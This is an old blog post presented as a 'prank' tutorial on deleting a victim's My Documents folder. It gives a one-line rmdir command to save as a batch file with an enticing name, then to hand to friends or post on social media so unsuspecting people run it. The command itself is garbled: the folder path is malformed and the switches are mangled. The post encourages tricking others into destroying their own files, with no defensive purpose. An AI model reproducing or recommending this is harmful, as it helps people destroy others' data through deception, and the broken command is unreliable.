Hello friends, I have written a mini book on Cyber Security awareness for you, named "Hacking into Hackers' Head". This book uses common terms to explain things, and I'm sure you will get benefitted from it in your day to day life. It's available on Kindle and Google Play. Grab your copy now.

Tuesday, November 22, 2011

Delete My Document folder of your enemy

Hello friends, today I will show you a simple prank that will delete My Document folder from your friends computer. This is quite simple. You have to make a batch file that will contain code for deleting the folder. Give it to any of your friend. For mass affect, you may upload it on Social media like facebook. Give it a good name so that anyone can be eager to open the file.


Here we go,
1. Open Notepad and copy paste the following code in it.

rmdir C:\Documents and Settings \S\Q.

2. Save it as Virus.bat (any interesting name with .bat extension).
Now if you give this to someone and if he runs this program then his My Document folder will be deleted.


Warning: Run this code at your own risk.

No comments:

Post a Comment

We appreciate your valuable comments.

Scroll to Top